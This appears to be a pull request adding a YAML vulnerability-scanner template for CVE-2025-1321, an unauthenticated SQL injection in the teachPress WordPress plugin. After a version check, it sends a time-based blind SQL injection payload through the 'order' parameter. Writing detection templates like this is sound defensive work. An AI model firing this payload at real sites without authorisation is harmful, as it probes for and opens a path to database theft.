### PR TITLE
Add CVE-2025-1321 - WordPress teachPress SQL Injection

### DIFF
--- a/http/cves/2025/CVE-2025-1321.yaml
+++ b/http/cves/2025/CVE-2025-1321.yaml
@@ -1,0 +1,62 @@
+id: CVE-2025-1321
+
+info:
+  name: WordPress teachPress <= 9.0.7 - SQL Injection
+  author: neosmith1
+  severity: medium
+  description: |
+    The teachPress plugin for WordPress is vulnerable to SQL injection via the 'order' parameter of the tpsearch shortcode in all versions up to and including 9.0.7. The shortcode renders on the frontend, allowing unauthenticated attackers to inject SQL queries and extract sensitive data from the database.
+  impact: |
+    Unauthenticated attackers can extract sensitive data from the WordPress database by exploiting the ORDER BY injection on any page containing the tpsearch shortcode.
+  remediation: |
+    Update teachPress to a version higher than 9.0.7 where the vulnerability has been fixed.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-1321
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/teachpress/teachpress-907-unauthenticated-sql-injection
+    - https://plugins.trac.wordpress.org/changeset/3266215/teachpress
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: developer
+    product: teachpress
+    shodan-query: http.component:"WordPress"
+  tags: cve,cve2025,wordpress,wp-plugin,sqli,teachpress
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/teachpress/readme.txt'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "compare_versions(version, '<= 9.0.7')"
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        part: body
+        name: version
+        group: 1
+        regex:
+          - 'Stable tag: ([0-9.]+)'
+        internal: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/?tpsearch=test&order=1,(SELECT 1 FROM (SELECT SLEEP(6))a)"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration >= 6"
+          - "status_code == 200"
+        condition: and


### PR DESCRIPTION
## Template Details

- **CVE**: CVE-2025-1321
- **Product**: teachPress WordPress Plugin
- **Vulnerability**: Unauthenticated SQL Injection
- **Severity**: Medium (7.5 CVSS)
- **Detection**: ORDER BY clause injection via tpsearch shortcode parameter

### References
- https://nvd.nist.gov/vuln/detail/CVE-2025-1321
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/teachpress/teachpress-907-unauthenticated-sql-injection